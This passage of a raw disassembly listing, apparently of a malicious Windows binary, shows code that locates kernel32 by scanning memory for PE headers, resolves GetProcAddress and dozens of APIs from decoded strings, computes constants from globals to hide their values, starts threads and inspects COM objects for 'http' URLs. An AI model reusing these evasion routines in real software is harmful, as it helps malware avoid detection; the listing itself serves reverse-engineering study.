mov ds:dword_448630[edi*4], ebx
jmp short loc_43BB43
; ---------------------------------------------------------------------------
loc_43BAF1: ; CODE XREF: sub_43B9CB+107�j
cmp ds:dword_44B790[edi*4], 0
jnz short loc_43BB43
mov ds:dword_448630[edi*4], edi
lea eax, [ebp+var_28]
push eax
movsx eax, word_44C264
add eax, dword_44C194
sub eax, 12h
push eax
lea ebx, ds:448630h[edi*4]
push ebx
push offset sub_43B63B
mov ebx, dword_44C114
add ebx, dword_44C12C
sub ebx, 10h
push ebx
push 0
call ds:dword_44BB90 ; CreateThread
mov ds:dword_44B790[edi*4], eax
loc_43BB43: ; CODE XREF: sub_43B9CB+B6�j
; sub_43B9CB+D5�j ...
inc edi
loc_43BB44: ; CODE XREF: sub_43B9CB+23�j
cmp edi, 5Ah
jbe loc_43B9F3
mov eax, dword_44C09C
sub eax, 5
push eax
call ds:dword_44B630
pop ecx
jmp loc_43B9E9
sub_43B9CB endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_43BB69 proc near ; CODE XREF: sub_440C0A+27C�p
push 2
call sub_4415E2
push 0
call sub_4415E2
add esp, 8
retn
sub_43BB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BB7B proc near ; CODE XREF: sub_440C0A+2EE�p
var_30D = byte ptr -30Dh
var_30C = byte ptr -30Ch
var_308 = byte ptr -308h
var_302 = byte ptr -302h
var_203 = byte ptr -203h
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 310h
push edi
push 0FFh
lea eax, [ebp+var_302]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
lea eax, [ebp+var_203]
push eax
push dword_44C168
push 0
push 1Ch
push 0
call ds:dword_448A44
push offset byte_44D837
call sub_43E507
movsx edi, word_44C1B4
sub edi, 2
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_4480F0
call ds:dword_44B634
push offset dword_44D824
call sub_43E507
movsx edi, word_44C124
sub edi, 4
push edi
lea edi, [ebp+var_203]
push edi
push eax
push offset dword_449260
call ds:dword_44B634
lea eax, sub_4413B6
mov ds:dword_44B62C, eax
lea eax, sub_4413B6
mov ds:dword_44604C, eax
lea eax, sub_43F9B8
mov ds:dword_44B774, eax
push offset dword_447020
call sub_441189
movsx eax, word_44C170
mov edx, dword_44C184
lea eax, [eax+edx+6]
push eax
push offset dword_449230
call sub_441353
lea eax, sub_442DA6
mov ds:dword_449228, eax
lea eax, sub_43D982
mov ds:dword_448A30, eax
lea eax, dword_4480F0
mov ds:dword_44A640, eax
lea eax, dword_449260
mov ds:dword_446018, eax
lea eax, dword_44B670
mov dword_44C370, eax
lea eax, [ebp+var_308]
push eax
movsx eax, word_44C230
sub eax, 6
push eax
push 0
push offset sub_43B992
push dword_44C1C8
push 0
call ds:dword_44BB90 ; CreateThread
push eax
call ds:dword_44A654 ; CloseHandle
lea eax, [ebp+var_30C]
push eax
movsx eax, word_44C1E0
sub eax, 3
push eax
push 0
push offset sub_43A55F
mov eax, dword_44C148
movsx edx, word_44C170
add eax, edx
sub eax, 4
push eax
push 0
call ds:dword_44BB90 ; CreateThread
push eax
call ds:dword_44A654 ; CloseHandle
mov eax, dword_44C25C
add eax, 2
mov ds:dword_448620, eax
mov eax, dword_44C0F8
sub eax, 6
push eax
lea eax, [ebp+var_FF]
push eax
call sub_442B97
add esp, 3Ch
mov eax, dword_44C0EC
cmp [ebp+eax+var_103], 64h
jnz short loc_43BD58
movsx eax, [ebp+var_FE]
mov edx, dword_44C238
add edx, 1Ch
movsx ecx, word_44C27C
add edx, ecx
sub eax, edx
mov [ebp+var_30D], al
movzx eax, [ebp+var_30D]
push eax
push 0
call sub_442511
add esp, 8
mov eax, dword_44C204
dec eax
mov ds:dword_448620, eax
loc_43BD58: ; CODE XREF: sub_43BB7B+19D�j
mov eax, dword_44C284
cmp [ebp+eax+var_108], 67h
jnz short loc_43BDB9
mov eax, dword_44C1D0
add eax, dword_44C25C
mov edx, dword_44C148
movsx ecx, word_44C22C
add edx, ecx
sub edx, 9
mov [ebp+eax+var_104], dl
lea eax, [ebp+var_FE]
push eax
call ds:dword_446054
mov [ebp-310h], eax
push eax
push offset dword_44B670
call sub_43CBE3
add esp, 0Ch
mov eax, dword_44C1D0
sub eax, 7
mov ds:dword_448620, eax
loc_43BDB9: ; CODE XREF: sub_43BB7B+1EA�j
pop edi
leave
retn
sub_43BB7B endp
; =============== S U B R O U T I N E =======================================
sub_43BDBC proc near ; DATA XREF: .data:0044C384�o
mov eax, 80004001h
retn 10h
sub_43BDBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BDC4 proc near ; CODE XREF: sub_43E2C0+CD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_44C310
push offset dword_44C2D0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_444524
pop ebp
retn
sub_43BDC4 endp
; =============== S U B R O U T I N E =======================================
sub_43BDDE proc near ; CODE XREF: sub_440C0A+C�p
push edi
push offset word_44D816
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C29C, eax
test eax, eax
jnz short loc_43BE11
push offset dword_44D808
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C29C, eax
loc_43BE11: ; CODE XREF: sub_43BDDE+1A�j
push offset byte_44D7F5
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B60C, eax
push offset word_44D7E2
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A64C, eax
push offset dword_44D7D0
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448618, eax
push offset byte_44D7BF
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449224, eax
push offset byte_44D7AB
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446050, eax
push offset word_44D79A
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_447010, eax
push offset byte_44D783
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485F4, eax
push offset dword_44D774
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A630, eax
push offset byte_44D767
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446004, eax
push offset byte_44D755
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B628, eax
push offset dword_44D744
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B654, eax
push offset word_44D732
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BBA4, eax
push offset byte_44D723
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449220, eax
push offset word_44D716
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B620, eax
push offset byte_44D707
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B644, eax
push offset byte_44D6F9
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446040, eax
push offset byte_44D6E7
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4480DC, eax
push offset byte_44D6D7
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446014, eax
push offset byte_44D6CB
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A40, eax
push offset byte_44D6BF
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B604, eax
push offset byte_44D6AD
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485FC, eax
push offset byte_44D69B
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B658, eax
push offset byte_44D68D
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B65C, eax
push offset byte_44D679
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B77C, eax
push offset dword_44D668
call sub_43E507
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B63C, eax
push offset word_44D652
call sub_43E507
add esp, 68h
push eax
push dword_44C29C
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446048, eax
pop edi
retn
sub_43BDDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C0EE proc near ; CODE XREF: sub_43E2C0+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call ds:dword_449248 ; VirtualAlloc
pop ebp
retn
sub_43C0EE endp
; =============== S U B R O U T I N E =======================================
sub_43C105 proc near ; CODE XREF: sub_44283E+257�p
push edi
push offset dword_44D644
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B664, eax
push offset dword_44D63C
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44700C, eax
push offset dword_44D628
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485E8, eax
push offset dword_44D618
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449244, eax
push offset byte_44D609
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B788, eax
push offset word_44D5FA
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446008, eax
push offset dword_44D5E8
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BB9C, eax
push offset byte_44D5DB
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BB8C, eax
push offset dword_44D5CC
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A654, eax
push offset byte_44D5BD
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B624, eax
push offset byte_44D5B1
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446000, eax
push offset word_44D5A6
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4480E0, eax
push offset byte_44D58F
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44600C, eax
push offset dword_44D578
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B640, eax
push offset word_44D562
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B608, eax
push offset word_44D552
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446034, eax
push offset word_44D546
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446028, eax
push offset word_44D536
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449248, eax
push offset byte_44D527
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A634, eax
push offset byte_44D519
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A34, eax
push offset dword_44D50C
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44861C, eax
push offset byte_44D4FB
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44925C, eax
push offset word_44D4EA
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44602C, eax
push offset word_44D4DA
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B770, eax
push offset dword_44D4C8
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449258, eax
push offset byte_44D4B7
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_447004, eax
push offset word_44D4AA
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44860C, eax
push offset byte_44D499
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B668, eax
push offset dword_44D484
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B650, eax
push offset dword_44D474
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_447000, eax
push offset byte_44D45F
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4480D4, eax
push offset word_44D452
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449364, eax
push offset word_44D442
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B61C, eax
push offset dword_44D434
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A648, eax
push offset word_44D41E
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A63C, eax
push offset byte_44D407
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448600, eax
push offset byte_44D3EF
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448A3C, eax
push offset byte_44D3D7
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446010, eax
push offset word_44D3BE
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B614, eax
push offset byte_44D3AB
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B780, eax
push offset byte_44D393
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B778, eax
push offset word_44D382
call sub_43E507
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BB98, eax
push offset dword_44D370
call sub_43E507
add esp, 0ACh
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4485F8, eax
pop edi
retn
sub_43C105 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C5C3 proc near ; CODE XREF: sub_44283E+20F�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21E = byte ptr -21Eh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word_44C1B4
mov edx, dword_44C280
lea ecx, [esi+edx+8]
shr edi, cl
mov esi, dword_44C270
add esi, 0Ah
add esi, dword_44C198
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_43C5FA: ; CODE XREF: sub_43C5C3+5D�j
; sub_43C5C3+99�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_43C622
movsx eax, word_44C0BC
movsx edx, word_44C104
lea eax, [eax+edx+0FFEFh]
sub ebx, eax
jmp short loc_43C5FA
; ---------------------------------------------------------------------------
loc_43C622: ; CODE XREF: sub_43C5C3+44�j
movsx eax, word_44C230
mov edx, dword_44C1D4
lea eax, [eax+edx+34h]
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_43C65E
mov eax, dword_44C1F4
add eax, 0FFFCh
sub ebx, eax
jmp short loc_43C5FA
; ---------------------------------------------------------------------------
loc_43C65E: ; CODE XREF: sub_43C5C3+8B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_43C68B
mov eax, dword_44C0EC
add eax, 0FFFBh
add eax, dword_44C0F0
sub ebx, eax
jmp loc_43C5FA
; ---------------------------------------------------------------------------
loc_43C68B: ; CODE XREF: sub_43C5C3+AF�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_444F8C
mov eax, dword_44C25C
add eax, dword_44C138
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_43C6ED
; ---------------------------------------------------------------------------
loc_43C6CB: ; CODE XREF: sub_43C5C3+140�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_43C6EA
cmp al, 7Ah
jge short loc_43C6EA
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_43C6EA: ; CODE XREF: sub_43C5C3+114�j
; sub_43C5C3+118�j
inc [ebp+var_4]
loc_43C6ED: ; CODE XREF: sub_43C5C3+106�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, dword_44C0A0
sub edx, 4
cmp eax, edx
jnz short loc_43C6CB
cmp [ebp+var_103], 4Bh
jnz short loc_43C73B
cmp [ebp+var_102], 45h
jnz short loc_43C73B
cmp [ebp+var_101], 52h
jnz short loc_43C73B
cmp [ebp+var_FE], 4Ch
jnz short loc_43C73B
cmp [ebp+var_FD], 33h
jnz short loc_43C73B
cmp [ebp+var_FC], 32h
jz short loc_43C740
loc_43C73B: ; CODE XREF: sub_43C5C3+149�j
; sub_43C5C3+152�j ...
jmp loc_43C96F
; ---------------------------------------------------------------------------
loc_43C740: ; CODE XREF: sub_43C5C3+176�j
movsx eax, word_44C264
add eax, dword_44C248
sub eax, 9
mov [ebp+var_108], eax
jmp loc_43C95A
; ---------------------------------------------------------------------------
loc_43C75B: ; CODE XREF: sub_43C5C3+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word_44C218
dec ecx
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_444F8C
movsx eax, word_44C240
mov edx, eax
add edx, dword_44C238
cmp byte ptr [ebp+edx+var_224+3], 47h
jnz loc_43C954
mov edx, dword_44C0A0
add edx, dword_44C120
cmp byte ptr [ebp+edx+var_228+2], 74h
jnz loc_43C954
cmp [ebp+eax+var_21E], 50h
jnz loc_43C954
movsx eax, word_44C178
movsx edx, word_44C0C0
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_43C954
mov eax, dword_44C234
add eax, dword_44C154
cmp byte ptr [ebp+eax+var_224+1], 41h
jnz loc_43C954
mov eax, dword_44C1A0
add eax, 2
add eax, dword_44C23C
cmp [ebp+eax+var_21F], 72h
jnz loc_43C954
mov eax, [ebp+var_108]
mov ecx, dword_44C194
sub ecx, 7
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
movsx ecx, word_44C144
sub ecx, 2
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov dword_44C294, ebx
mov ds:dword_4481F8, edx
lea edi, [ebp+var_23D]
lea esi, aCreatethread ; "CreateThread"
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, aEntercriticals ; "EnterCriticalSection"
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, aInitializecrit ; "InitializeCriticalSection"
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, aLeavecriticals ; "LeaveCriticalSection"
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BB90, eax
lea eax, [ebp+var_252]
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B660, eax
lea eax, [ebp+var_26C]
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_447008, eax
lea eax, [ebp+var_281]
push eax
push dword_44C294
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44A650, eax
jmp short loc_43C96F
; ---------------------------------------------------------------------------
loc_43C954: ; CODE XREF: sub_43C5C3+1F1�j
; sub_43C5C3+20B�j ...
inc [ebp+var_108]
loc_43C95A: ; CODE XREF: sub_43C5C3+193�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_43C75B
loc_43C96F: ; CODE XREF: sub_43C5C3:loc_43C73B�j
; sub_43C5C3+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C5C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C974 proc near ; CODE XREF: sub_442EE8+4A�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_444F6C
push ebx
push esi
push edi
cmp dword_44C370, 0
jnz short loc_43C9A4
mov eax, dword_44C0D4
add eax, dword_44C280
cmp ds:dword_448620, eax
jb loc_43CBDE
loc_43C9A4: ; CODE XREF: sub_43C974+17�j
lea eax, [ebp+var_10020]
push eax
call ds:dword_446038
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, dword_44C148
sub eax, 2
push eax
push [ebp+arg_0]
call ds:dword_449254
mov edi, eax
mov eax, dword_44C0F4
sub eax, 7
cmp edi, eax
jnz loc_43CBDE
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push offset dword_44DAD8
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word_44C1F0
sub eax, 3
cmp edi, eax
jnz loc_43CBDE
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, dword_44C1A0
sub eax, 3
cmp edi, eax
jnz loc_43CBD8
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_43E434
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call ds:dword_44BBA0
cmp [ebp+var_10003], 68h
jnz short loc_43CA8F
cmp [ebp+var_10002], 74h
jnz short loc_43CA8F
cmp [ebp+var_10001], 74h
jnz short loc_43CA8F
cmp [ebp+var_10000], 70h
jz short loc_43CA94
loc_43CA8F: ; CODE XREF: sub_43C974+FE�j
; sub_43C974+107�j ...
jmp loc_43CBD8
; ---------------------------------------------------------------------------
loc_43CA94: ; CODE XREF: sub_43C974+119�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, dword_44C164
movsx edx, word_44C170
add eax, edx
sub eax, 6
cmp edi, eax
jnz loc_43CBD8
lea eax, [ebp+var_4]
push eax
push offset dword_44DA58
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word_44C264
add eax, dword_44C1F8
sub eax, 0Ch
cmp edi, eax
jnz loc_43CBCC
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
movsx eax, word_44C150
add eax, dword_44C1EC
sub eax, 10h
cmp edi, eax
jnz loc_43CBC3
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, dword_44C0F8
add eax, dword_44C110
sub eax, 0Ch
cmp edi, eax
jz short loc_43CB57
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_43CBC3
; ---------------------------------------------------------------------------
loc_43CB57: ; CODE XREF: sub_43C974+1D3�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_43CB6A
xor ebx, ebx
inc ebx
loc_43CB6A: ; CODE XREF: sub_43C974+1F1�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_43CBC3
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, dword_44C268
sub eax, 4
cmp edi, eax
jnz short loc_43CBC3
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_2
push [ebp+var_1002C]
push [ebp+var_4]
call sub_44206A
add esp, 10h
loc_43CBC3: ; CODE XREF: sub_43C974+1A8�j
; sub_43C974+1E1�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43CBCC: ; CODE XREF: sub_43C974+17B�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_43CBD8: ; CODE XREF: sub_43C974+C7�j
; sub_43C974:loc_43CA8F�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_43CBDE: ; CODE XREF: sub_43C974+2A�j
; sub_43C974+6B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43C974 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CBE3 proc near ; CODE XREF: sub_43BB7B+229�p
; sub_43CF47+37B�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
movsx edi, word_44C208
mov eax, esi
test eax, eax
jge short loc_43CC02
add eax, 0FFh
loc_43CC02: ; CODE XREF: sub_43CBE3+18�j
sar eax, 8
mov ebx, eax
imul ebx, dword_44C128
lea edi, [edi+ebx+1Ah]
mov [ebp+var_8], edi
mov edi, dword_44C280
add edi, 11h
mov eax, esi
test eax, eax
jge short loc_43CC29
add eax, 0FFh
loc_43CC29: ; CODE XREF: sub_43CBE3+3F�j
sar eax, 8
mov ebx, dword_44C270
add ebx, 0Dh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, dword_44C254
add edi, 18h
mov eax, esi
test eax, eax
jge short loc_43CC53
add eax, 0FFFFh
loc_43CC53: ; CODE XREF: sub_43CBE3+69�j
sar eax, 10h
mov ebx, dword_44C138
add ebx, 17h
mov edx, eax
imul edx, ebx
add edi, edx
